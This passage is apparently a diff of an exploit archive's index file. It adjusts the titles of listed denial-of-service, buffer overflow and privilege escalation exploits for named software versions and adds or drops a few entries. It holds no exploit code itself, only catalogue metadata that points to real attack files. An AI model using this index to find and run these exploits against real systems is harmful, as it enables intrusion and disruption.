Service",2007-02-25,sehato,windows,dos,0 29660,platforms/windows/dos/29660.txt,"Microsoft Office 2003 - Denial of Service",2007-02-25,sehato,windows,dos,0 29664,platforms/windows/dos/29664.txt,"Microsoft Publisher 2007 - Remote Denial of Service",2007-02-26,"Tom Ferris",windows,dos,0 @@ -3800,14 +3802,14 @@ id,file,description,date,author,platform,type,port 30091,platforms/linux/dos/30091.py,"OpenOffice 2.2 Writer Component - Remote Denial of Service",2007-05-28,shinnai,linux,dos,0 30104,platforms/windows/dos/30104.nasl,"F-Secure Policy Manager 7.00 - 'FSMSH.dll' Remote Denial of Service",2007-05-30,"David Maciejak",windows,dos,0 30193,platforms/windows/dos/30193.html,"Apple Safari 3.0.1 for Windows - 'Corefoundation.dll' Denial of Service",2007-06-16,Lostmon,windows,dos,0 -30194,platforms/windows/dos/30194.txt,"Apple Safari 3 for Windows - Document.Location Denial of Service",2007-06-16,azizov,windows,dos,0 +30194,platforms/windows/dos/30194.txt,"Apple Safari 3 for Windows - 'Document.Location' Denial of Service",2007-06-16,azizov,windows,dos,0 30224,platforms/windows/dos/30224.py,"Ingress Database Server 2.6 - Multiple Remote Vulnerabilities",2007-06-21,anonymous,windows,dos,0 30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 - Invalid Page Remote Denial of Service",2007-06-25,Prili,windows,dos,0 30251,platforms/linux/dos/30251.c,"GD Graphics Library 2.0.34 - (libgd) gdImageCreateXbm Function Unspecified Denial of Service",2007-06-26,anonymous,linux,dos,0 30252,platforms/windows/dos/30252.py,"Conti FTP Server 1.0 - Large String Denial of Service",2007-06-27,35c666,windows,dos,0 30255,platforms/windows/dos/30255.txt,"PC SOFT WinDEV 11 - WDP File Parsing Stack Buffer Overflow",2007-06-28,"Jerome Athias",windows,dos,0 40743,platforms/windows/dos/40743.html,"VBScript 5.8.7600.16385 / 5.8.9600.16384 - RegExpComp::PnodeParse Out-of-Bounds Read",2016-11-09,Skylined,windows,dos,0 -30308,platforms/windows/dos/30308.py,"PotPlayer 1.5.42509 Beta - Denial of Service (Integer Division by Zero Exploit)",2013-12-15,sajith,windows,dos,0 +30308,platforms/windows/dos/30308.py,"PotPlayer 1.5.42509 Beta - Integer Division by Zero Denial of Service",2013-12-15,sajith,windows,dos,0 30314,platforms/windows/dos/30314.txt,"Yahoo! Messenger 8.1 - Address Book Remote Buffer Overflow",2007-07-16,"Rajesh Sethumadhavan",windows,dos,0 30791,platforms/multiple/dos/30791.txt,"I Hear U 0.5.6 - Multiple Remote Denial of Service Vulnerabilities",2007-11-19,"Luigi Auriemma",multiple,dos,0 30395,platforms/php/dos/30395.txt,"PHP openssl_x509_parse() - Memory Corruption",2013-12-17,"Stefan Esser",php,dos,0 @@ -3876,7 +3878,7 @@ id,file,description,date,author,platform,type,port 30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 - Cookie Handling Denial of Service",2007-11-14,"laurent gaffie",linux,dos,0 40602,platforms/windows/dos/40602.html,"Microsoft Edge - 'Array.map' Heap Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0 30766,platforms/linux/dos/30766.c,"GNU TAR 1.15.91 / CPIO 2.5.90 - safer_name_suffix Remote Denial of Service",2007-11-14,"Dmitry V. Levin",linux,dos,0 -30767,platforms/windows/dos/30767.html,"Apple Safari 3.0.x - for Windows Document.Location.Hash Buffer Overflow",2007-06-25,"Azizov E",windows,dos,0 +30767,platforms/windows/dos/30767.html,"Apple Safari 3.0.x for Windows - 'Document.Location.Hash' Buffer Overflow",2007-06-25,"Azizov E",windows,dos,0 40604,platforms/windows/dos/40604.html,"Microsoft Edge - 'Array.join' Infomation Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0 30776,platforms/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial of Service",2007-11-19,"Luigi Auriemma",linux,dos,0 30779,platforms/multiple/dos/30779.txt,"Rigs of Rods 0.33d - Long Vehicle Name Buffer Overflow",2007-11-19,"Luigi Auriemma",multiple,dos,0 @@ -3924,7 +3926,7 @@ id,file,description,date,author,platform,type,port 31148,platforms/multiple/dos/31148.txt,"Opium OPI Server and CyanPrintIP - Format String / Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos,0 31150,platforms/multiple/dos/31150.txt,"RPM Remote Print Manager 4.5.1 - Service Remote Buffer Overflow",2008-02-11,"Luigi Auriemma",multiple,dos,0 31306,platforms/hardware/dos/31306.txt,"Nortel UNIStim IP Phone - Remote Ping Denial of Service",2008-02-26,sipherr,hardware,dos,0 -31307,platforms/android/dos/31307.py,"Android Web Browser - GIF File Heap Based Buffer Overflow",2008-03-04,"Alfredo Ortega",android,dos,0 +31307,platforms/android/dos/31307.py,"Google Android Web Browser - '.GIF' File Heap Based Buffer Overflow",2008-03-04,"Alfredo Ortega",android,dos,0 31168,platforms/windows/dos/31168.pl,"NCH Software Express Burn Plus 4.68 - '.EBP' Project File Buffer Overflow",2014-01-24,LiquidWorm,windows,dos,0 31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec ActiveX - (Data parameter) Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 31177,platforms/windows/dos/31177.html,"MW6 Technologies Datamatrix ActiveX - (Data Parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 @@ -3946,7 +3948,7 @@ id,file,description,date,author,platform,type,port 31300,platforms/windows/dos/31300.txt,"Surgemail and WebMail 3.0 - 'Page' Command Remote Format String",2008-02-25,"Luigi Auriemma",windows,dos,0 31301,platforms/windows/dos/31301.txt,"Surgemail 3.0 - Real CGI executables Remote Buffer Overflow",2008-02-25,"Luigi Auriemma",windows,dos,0 31302,platforms/windows/dos/31302.txt,"SurgeFTP 2.3a2 - 'Content-Length' Parameter Null Pointer Denial of Service",2008-02-25,"Luigi Auriemma",windows,dos,0 -31308,platforms/android/dos/31308.html,"Android Web Browser - BMP File Integer Overflow",2008-03-04,"Alfredo Ortega",android,dos,0 +31308,platforms/android/dos/31308.html,"Google Android Web Browser - '.BMP' File Integer Overflow",2008-03-04,"Alfredo Ortega",android,dos,0 31310,platforms/windows/dos/31310.txt,"Trend Micro OfficeScan - Buffer Overflow / Denial of Service",2008-02-27,"Luigi Auriemma",windows,dos,0 31323,platforms/windows/dos/31323.c,"ADI Convergence Galaxy FTP Server Password - Remote Denial of Service",2008-03-01,"Maks M",windows,dos,0 31327,platforms/multiple/dos/31327.txt,"Borland StarTeam 2008 10.0.57 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",multiple,dos,0 @@ -4013,7 +4015,7 @@ id,file,description,date,author,platform,type,port 31884,platforms/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 - (Wireless-G Router) Malformed HTTP Request Denial of Service",2008-06-05,dubingyao,hardware,dos,0 31889,platforms/novell/dos/31889.pl,"Novell Groupwise Messenger 2.0 Client - Buffer Overflow",2008-07-02,"Francisco Amato",novell,dos,0 31899,platforms/windows/dos/31899.txt,"VideoLAN VLC Media Player 2.1.3 - '.avs' Crash (PoC)",2014-02-25,kw4,windows,dos,0 -31914,platforms/windows/dos/31914.pl,"Gold MP4 Player 3.3 - Buffer Overflow PoC (SEH)",2014-02-26,"Gabor Seljan",windows,dos,0 +31914,platforms/windows/dos/31914.pl,"Gold MP4 Player 3.3 - Buffer Overflow (PoC) (SEH)",2014-02-26,"Gabor Seljan",windows,dos,0 31915,platforms/linux/dos/31915.py,"GoAhead Web Server 3.1.x - Denial of Service",2014-02-26,"Alaeddine MESBAHI",linux,dos,80 31919,platforms/multiple/dos/31919.c,"S.T.A.L.K.E.R. 1.0.06 - Remote Denial of Service",2008-06-15,"Luigi Auriemma",multiple,dos,0 31931,platforms/multiple/dos/31931.txt,"Crysis 1.21 - HTTP/XML-RPC Service Remote Denial of Service",2008-06-16,"Luigi Auriemma",multiple,dos,0 @@ -4091,7 +4093,7 @@ id,file,description,date,author,platform,type,port 32550,platforms/windows/dos/32550.html,"Microsoft DebugDiag 1.0 - 'CrashHangExt.dll' ActiveX Control Remote Denial of Service",2008-10-30,suN8Hclf,windows,dos,0 32551,platforms/linux/dos/32551.txt,"Dovecot 1.1.x - Invalid Message Address Parsing Denial of Service",2008-10-30,anonymous,linux,dos,0 32572,platforms/windows/dos/32572.txt,"Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow",2008-11-07,alex,windows,dos,0 -32573,platforms/windows/dos/32573.txt,"Microsoft Windows Server 2003/Vista - 'UnhookWindowsHookEx' Local Denial of Service",2008-11-09,killprog.org,windows,dos,0 +32573,platforms/windows/dos/32573.txt,"Microsoft Windows Vista/2003 - 'UnhookWindowsHookEx' Local Denial of Service",2008-11-09,killprog.org,windows,dos,0 32581,platforms/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",multiple,dos,0 32583,platforms/hardware/dos/32583.txt,"Netgear WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,hardware,dos,0 32587,platforms/windows/dos/32587.txt,"VeryPDF PDFView - ActiveX Component Heap Buffer Overflow",2008-11-15,r0ut3r,windows,dos,0 @@ -4271,7 +4273,7 @@ id,file,description,date,author,platform,type,port 33819,platforms/windows/dos/33819.txt,"McAfee Email Gateway < 6.7.2 Hotfix 2 - Multiple Vulnerabilities",2010-04-06,"Nahuel Grisolia",windows,dos,0 33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation Null Pointer Denial of Service",2014-06-13,"A reliable source",windows,dos,0 33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 - Memory Consumption Remote Denial of Service",2010-04-27,fallenpegasus,linux,dos,0 -33860,platforms/windows/dos/33860.html,"Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash PoC (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0 +33860,platforms/windows/dos/33860.html,"Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash (PoC) (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0 34145,platforms/unix/dos/34145.txt,"Python 3.2 - 'audioop' Module Memory Corruption",2010-06-14,haypo,unix,dos,0 33876,platforms/multiple/dos/33876.c,"NovaSTOR NovaNET 11.0 - Remote Denial of Service / Arbitrary memory read",2007-09-14,mu-b,multiple,dos,0 33879,platforms/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP 13.0 - Remote Denial of Service",2007-10-02,mu-b,multiple,dos,0 @@ -4289,7 +4291,7 @@ id,file,description,date,author,platform,type,port 33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser 26.5.9999.3511 - Remote Stack Overflow (Denial of Service)",2014-07-02,LiquidWorm,windows,dos,0 33973,platforms/windows/dos/33973.pl,"Hyplay 1.2.0326.1 - '.asx' Remote Denial of Service",2010-05-10,"Steve James",windows,dos,0 33977,platforms/windows/dos/33977.txt,"Torque Game Engine - Multiple Denial of Service Vulnerabilities",2010-05-09,"Luigi Auriemma",windows,dos,0 -34010,platforms/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos,0 +34010,platforms/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption (PoC) (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos,0 34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 - Nested Directory Tree Local Denial of Service",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0 34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 - 'in.ftpd' Long Command Handling Security",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0 34051,platforms/windows/dos/34051.py,"Core FTP Server 1.0.343 - Directory Traversal",2010-05-28,"John Leitch",windows,dos,0 @@ -4339,7 +4341,7 @@ id,file,description,date,author,platform,type,port 34428,platforms/windows/dos/34428.py,"Quintessential Media Player 5.0.121 - '.m3u' Buffer Overflow",2010-08-09,"Abhishek Lyall",windows,dos,0 34442,platforms/windows/dos/34442.html,"Kylinsoft InstantGet 2.08 - ActiveX Control 'ShowBar' Method Buffer Overflow",2009-09-19,the_Edit0r,windows,dos,0 34457,platforms/multiple/dos/34457.txt,"Sniper Elite 1.0 - Null Pointer Dereference Denial of Service",2009-08-14,"Luigi Auriemma",multiple,dos,0 -34458,platforms/windows/dos/34458.html,"Microsoft Internet Explorer - Memory Corruption PoC (MS14-029)",2014-08-28,PhysicalDrive0,windows,dos,0 +34458,platforms/windows/dos/34458.html,"Microsoft Internet Explorer - Memory Corruption (PoC) (MS14-029)",2014-08-28,PhysicalDrive0,windows,dos,0 34460,platforms/windows/dos/34460.py,"Sonique 2.0 - '.xpl' Remote Stack Based Buffer Overflow",2010-08-12,"Hamza_hack_dz & Black-liondz1",windows,dos,0 34463,platforms/windows/dos/34463.py,"HTML Help Workshop 1.4 - Buffer Overflow (SEH)",2014-08-29,"Moroccan Kingdom (MKD)",windows,dos,0 34480,platforms/windows/dos/34480.py,"Xilisoft Video Converter 3.1.8.0720b - '.ogg' Buffer Overflow",2010-08-16,"Praveen Darshanam",windows,dos,0 @@ -4461,6 +4463,7 @@ id,file,description,date,author,platform,type,port 35889,platforms/windows/dos/35889.py,"IceCream Ebook Reader 1.41 - Crash (PoC)",2015-01-23,"Kapil Soni",windows,dos,0 35895,platforms/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 144525.5 - Null Pointer Dereference Denial of Service",2011-06-28,"Luigi Auriemma",windows,dos,0 35913,platforms/android/dos/35913.txt,"Android WiFi-Direct - Denial of Service",2015-01-26,"Core Security",android,dos,0 +35935,platforms/windows/dos/35935.py,"UniPDF 1.1 - Crash (PoC) (SEH)",2015-01-29,bonze,windows,dos,0 35938,platforms/freebsd/dos/35938.txt,"FreeBSD Kernel - Multiple Vulnerabilities",2015-01-29,"Core Security",freebsd,dos,0 35939,platforms/hardware/dos/35939.txt,"Alice Modem 1111 - 'rulename' Parameter Cross-Site Scripting / Denial of Service",2011-07-12,"Moritz Naumann",hardware,dos,0 35951,platforms/linux/dos/35951.py,"Exim ESMTP 4.80 - glibc gethostbyname Denial of Service",2015-01-29,1n3,linux,dos,0 @@ -4496,6 +4499,7 @@ id,file,description,date,author,platform,type,port 36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 - HTTP POST Request Null Pointer Content-Length Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0 36378,platforms/multiple/dos/36378.txt,"CoDeSys 3.4 - Null Pointer Invalid HTTP Request Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0 36405,platforms/windows/dos/36405.txt,"Serv-U FTP Server 11.1.0.3 - Denial of Service / Security Bypass",2011-12-05,"Luigi Auriemma",windows,dos,0 +36388,platforms/linux/dos/36388.py,"Brasero CD/DVD Burner 3.4.1 - '.m3u' Buffer Overflow Crash (PoC)",2015-03-16,"Avinash Thapa",linux,dos,0 36392,platforms/windows/dos/36392.txt,"Intel Network Adapter Diagnostic Driver - IOCTL Handling",2015-03-14,"Glafkos Charalambous",windows,dos,0 36403,platforms/windows/dos/36403.html,"HP Device Access Manager for HP ProtectTools 5.0/6.0 - Heap Memory Corruption",2011-12-02,"High-Tech Bridge SA",windows,dos,0 36404,platforms/linux/dos/36404.c,"GNU glibc - Timezone Parsing Remote Integer Overflow",2009-06-01,dividead,linux,dos,0 @@ -4516,13 +4520,14 @@ id,file,description,date,author,platform,type,port 36682,platforms/php/dos/36682.php,"PHP PDORow Object - Remote Denial of Service",2011-09-24,anonymous,php,dos,0 36741,platforms/lin_x86/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Service (PoC)",2015-04-13,sleepya,lin_x86,dos,0 36743,platforms/linux/dos/36743.c,"Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service",2015-04-13,"Emeric Nasi",linux,dos,0 -36773,platforms/windows/dos/36773.c,"Microsoft Windows - 'HTTP.sys' PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0 +36773,platforms/windows/dos/36773.c,"Microsoft Windows - 'HTTP.sys' (PoC) (MS15-034)",2015-04-15,rhcp011235,windows,dos,0 36776,platforms/windows/dos/36776.py,"Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80 36788,platforms/windows/dos/36788.txt,"Oracle - Outside-In '.DOCX' File Parsing Memory Corruption",2015-04-17,"Francis Provencher",windows,dos,0 36789,platforms/php/dos/36789.php,"PHP 5.3.8 - Remote Denial of Service",2011-12-18,anonymous,php,dos,0 36814,platforms/osx/dos/36814.c,"Apple Mac OSX - Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0 36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 - Remote Configuration Editor / Web Server Denial of Service",2015-04-23,"Koorosh Ghorbani",hardware,dos,80 36840,platforms/multiple/dos/36840.py,"Wireshark 1.12.4 - Memory Corruption and Access Violation (PoC)",2015-04-27,"Avinash Thapa",multiple,dos,0 +36841,platforms/windows/dos/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)",2015-04-27,"Avinash Thapa",windows,dos,0 36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - SEH Overflow Crash (PoC)",2015-04-28,"Avinash Thapa",windows,dos,0 36868,platforms/hardware/dos/36868.pl,"Mercury MR804 Router - Multiple HTTP Header Fields Denial of Service Vulnerabilities",2012-02-21,demonalex,hardware,dos,0 36869,platforms/multiple/dos/36869.txt,"IBM solidDB 6.5.0.8 - 'SELECT' Statement 'WHERE' Condition Denial of Service",2012-02-09,IBM,multiple,dos,0 @@ -4545,7 +4550,7 @@ id,file,description,date,author,platform,type,port 37188,platforms/windows/dos/37188.txt,"WebDrive 12.2 (B4172) - Buffer Overflow",2015-06-03,Vulnerability-Lab,windows,dos,0 37199,platforms/hardware/dos/37199.txt,"ZTE AC 3633R USB Modem - Multiple Vulnerabilities",2015-06-04,Vishnu,hardware,dos,0 37218,platforms/jsp/dos/37218.txt,"Atlassian Tempo 6.4.3 / JIRA 5.0.0 / Gliffy 3.7.0 - XML Parsing Denial of Service",2012-05-17,anonymous,jsp,dos,0 -37239,platforms/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash PoC (2)",2015-06-08,"Pawel Wylecial",windows,dos,0 +37239,platforms/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash (PoC) (2)",2015-06-08,"Pawel Wylecial",windows,dos,0 37249,platforms/linux/dos/37249.py,"Libmimedir - '.VCF' Memory Corruption (PoC)",2015-06-10,"Jeremy Brown",linux,dos,0 37299,platforms/windows/dos/37299.py,"XtMediaPlayer 0.93 - '.wav' Crash (PoC)",2015-06-16,"SATHISH ARTHAR",windows,dos,0 37300,platforms/windows/dos/37300.py,"FinePlayer 2.20 - '.mp4' Crash (PoC)",2015-06-16,"SATHISH ARTHAR",windows,dos,0 @@ -5425,7 +5430,7 @@ id,file,description,date,author,platform,type,port 41668,platforms/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0 41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0 41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0 -41778,platforms/multiple/dos/41778.cc,"Apple macOS/IOS 10.12.2(16C67) - mach_msg Heap Overflow",2017-03-30,"Google Security Research",multiple,dos,0 +41778,platforms/multiple/dos/41778.cc,"Apple macOS/IOS 10.12.2 (16C67) - 'mach_msg' Heap Overflow",2017-03-30,"Google Security Research",multiple,dos,0 41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0 41734,platforms/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",windows,dos,0 41737,platforms/windows/dos/41737.txt,"Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow",2017-03-27,"Nassim Asrir",windows,dos,0 @@ -5724,7 +5729,7 @@ id,file,description,date,author,platform,type,port 1465,platforms/windows/local/1465.c,"Microsoft Windows - ACLs Privilege Escalation (2)",2006-02-12,"Andres Tarasco",windows,local,0 1470,platforms/windows/local/1470.c,"Microsoft HTML Help Workshop - '.hhp' Buffer Overflow (1)",2006-02-06,bratax,windows,local,0 1479,platforms/qnx/local/1479.sh,"QNX Neutrino 6.2.1 - (phfont) Race Condition Privilege Escalation",2006-02-08,kokanin,qnx,local,0 -1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 - Insecure rc.local Permissions Plus System Crash",2006-02-08,kokanin,qnx,local,0 +1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 - Insecure 'rc.local' Permissions System Crash / Privilege Escalation",2006-02-08,kokanin,qnx,local,0 1490,platforms/windows/local/1490.c,"Microsoft HTML Help Workshop - '.hhp' Buffer Overflow (2)",2006-02-11,k3xji,windows,local,0 1495,platforms/windows/local/1495.cpp,"Microsoft HTML Help Workshop - '.hhp' Buffer Overflow (3)",2006-02-14,darkeagle,windows,local,0 1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library Exploit (2)",2006-02-20,"Marco Ivaldi",linux,local,0 @@ -5745,8 +5750,8 @@ id,file,description,date,author,platform,type,port 1806,platforms/windows/local/1806.c,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (1)",2006-05-19,Devil-00,windows,local,0 40336,platforms/win_x86-64/local/40336.py,"Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure",2016-09-05,"Yakir Wizman",win_x86-64,local,0 1831,platforms/linux/local/1831.txt,"tiffsplit (libtiff 3.8.2) - Local Stack Buffer Overflow (PoC)",2006-05-26,nitr0us,linux,local,0 -1910,platforms/windows/local/1910.c,"Microsoft Windows - NtClose DeadLock PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0 -1911,platforms/windows/local/1911.c,"Microsoft Windows XP/2000 - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0 +1910,platforms/windows/local/1910.c,"Microsoft Windows - NtClose DeadLock (PoC) (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0 +1911,platforms/windows/local/1911.c,"Microsoft Windows XP/2000 - 'Mrxsmb.sys' Privilege Escalation (PoC) (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0 1917,platforms/windows/local/1917.pl,"Pico Zip 4.01 - (Long Filename) Buffer Overflow",2006-06-15,c0rrupt,windows,local,0 1924,platforms/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 - Root Password Disclosure",2006-06-18,php0t,multiple,local,0 1944,platforms/windows/local/1944.c,"Microsoft Excel - Unspecified Remote Code Execution",2006-06-22,"naveed afzal",windows,local,0 @@ -5858,7 +5863,7 @@ id,file,description,date,author,platform,type,port 3429,platforms/windows/local/3429.php,"PHP COM extensions - (inconsistent Win32) Safe_mode Bypass Exploit",2007-03-07,anonymous,windows,local,0 3431,platforms/windows/local/3431.php,"PHP 4.4.6 - crack_opendict() Local Buffer Overflow (PoC)",2007-03-08,rgod,windows,local,0 3439,platforms/windows/local/3439.php,"PHP 4.4.6 - snmpget() object id Local Buffer Overflow (PoC)",2007-03-09,rgod,windows,local,0 -3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - zip:// URL Wrapper Buffer Overflow",2007-03-09,"Stefan Esser",linux,local,0 +3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - 'zip://' URL Wrapper Buffer Overflow",2007-03-09,"Stefan Esser",linux,local,0 3442,platforms/multiple/local/3442.php,"PHP 4.4.6 - cpdf_open() Local Source Code Disclosure (PoC)",2007-03-09,rgod,multiple,local,0 3451,platforms/win_x86/local/3451.c,"Oracle 10g (Windows x86) - (PROCESS_DUP_HANDLE) Local Privilege Elevation",2007-03-10,"Cesar Cerrudo",win_x86,local,0 3460,platforms/osx/local/3460.php,"PHP 5.2.0 (OSX) - EXT/Filter Space Trimming Buffer Underflow Exploit",2007-03-12,"Stefan Esser",osx,local,0 @@ -6032,7 +6037,7 @@ id,file,description,date,author,platform,type,port 7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - (error_log) Safe_mode Bypass",2008-11-20,SecurityReason,multiple,local,0 7177,platforms/linux/local/7177.c,"Oracle Database Vault - 'ptrace(2)' Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0 40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA root Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0 -7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - runtime.getRuntime().exec() Privilege Escalation",2008-11-28,Abysssec,windows,local,0 +7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - 'runtime.getRuntime().exec()' Privilege Escalation",2008-11-28,Abysssec,windows,local,0 7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Stack Overflow",2008-11-30,SkD,windows,local,0 7313,platforms/linux/local/7313.sh,"Debian - (symlink attack in login) Arbitrary File Ownership (PoC)",2008-12-01,"Paul Szabo",linux,local,0 7329,platforms/windows/local/7329.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow",2008-12-03,Encrypt3d.M!nd,windows,local,0 @@ -6203,7 +6208,7 @@ id,file,description,date,author,platform,type,port 8789,platforms/windows/local/8789.py,"Slayer 2.4 - (skin) Universal Buffer Overflow (SEH)",2009-05-26,SuNHouSe2,windows,local,0 8799,platforms/win_x86/local/8799.txt,"PHP 5.2.9 (Windows x86) - Local Safemod Bypass",2009-05-26,Abysssec,win_x86,local,0 8833,platforms/hardware/local/8833.txt,"Linksys WAG54G2 - Web Management Console Arbitrary Command Execution",2009-06-01,Securitum,hardware,local,0 -8863,platforms/windows/local/8863.c,"Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow PoC (SEH)",2009-06-03,"fl0 fl0w",windows,local,0 +8863,platforms/windows/local/8863.c,"Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow (PoC) (SEH)",2009-06-03,"fl0 fl0w",windows,local,0 8875,platforms/windows/local/8875.txt,"Online Armor < 3.5.0.12 - 'OAmon.sys' Privilege Escalation",2009-06-04,"NT Internals",windows,local,0 8881,platforms/windows/local/8881.php,"PeaZIP 2.6.1 - Compressed Filename Command Injection",2009-06-05,Nine:Situations:Group,windows,local,0 8896,platforms/osx/local/8896.c,"Apple Mac OSX xnu 1228.9.59 - Kernel Privilege Escalation",2009-06-08,mu-b,osx,local,0 @@ -6234,7 +6239,7 @@ id,file,description,date,author,platform,type,port 9199,platforms/windows/local/9199.txt,"Adobe 9.x Related Service - 'getPlus_HelperSvc.exe' Privilege Escalation",2009-07-20,Nine:Situations:Group,windows,local,0 9207,platforms/linux/local/9207.sh,"PulseAudio setuid - Privilege Escalation",2009-07-20,anonymous,linux,local,0 9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Privilege Escalation",2009-07-20,anonymous,linux,local,0 -9215,platforms/windows/local/9215.pl,"Streaming Audio Player 0.9 - (skin) Local Stack Overflow (SEH)",2009-07-20,SkuLL-HackeR,windows,local,0 +9215,platforms/windows/local/9215.pl,"Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (SEH)",2009-07-20,SkuLL-HackeR,windows,local,0 9216,platforms/windows/local/9216.pl,"Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (SEH)",2009-07-20,SkuLL-HackeR,windows,local,0 9221,platforms/windows/local/9221.pl,"WINMOD 1.4 - '.lst' Local Buffer Overflow (SEH)",2009-07-21,hack4love,windows,local,0 9223,platforms/windows/local/9223.txt,"Adobe Acrobat 9.1.2 NOS - Privilege Escalation",2009-07-21,"Jeremy Brown",windows,local,0 @@ -6258,7 +6263,6 @@ id,file,description,date,author,platform,type,port 9354,platforms/windows/local/9354.pl,"Mediacoder 0.7.1.4486 - '.lst' Universal Buffer Overflow (SEH)",2009-08-04,germaya_x,windows,local,0 9360,platforms/windows/local/9360.pl,"BlazeDVD 5.1/HDTV Player 6.0 - '.plf' Universal Buffer Overflow (SEH)",2009-08-04,"ThE g0bL!N",windows,local,0 9363,platforms/linux/local/9363.c,"Linux Kernel < 2.6.14.6 - 'procfs' Kernel Memory Disclosure",2009-08-05,"Jon Oberheide",linux,local,0 -9364,platforms/windows/local/9364.py,"Tuniac 090517c - '.m3u' Local File Crash (PoC)",2009-08-05,Dr_IDE,windows,local,0 9366,platforms/windows/local/9366.pl,"jetAudio 7.1.9.4030 plus vx - '.m3u' Local Stack Overflow (SEH)",2009-08-05,corelanc0d3r,windows,local,0 9375,platforms/windows/local/9375.py,"JetAudio 7.1.9.4030 - '.m3u' Universal Stack Overflow (SEH)",2009-08-06,Dr_IDE,windows,local,0 9377,platforms/windows/local/9377.pl,"A2 Media Player Pro 2.51 - '.m3u' / '.m3l' Universal Local Buffer Overflow (SEH)",2009-08-06,hack4love,windows,local,0 @@ -6392,9 +6396,9 @@ id,file,description,date,author,platform,type,port 10346,platforms/windows/local/10346.rb,"gAlan 0.2.1 - Universal 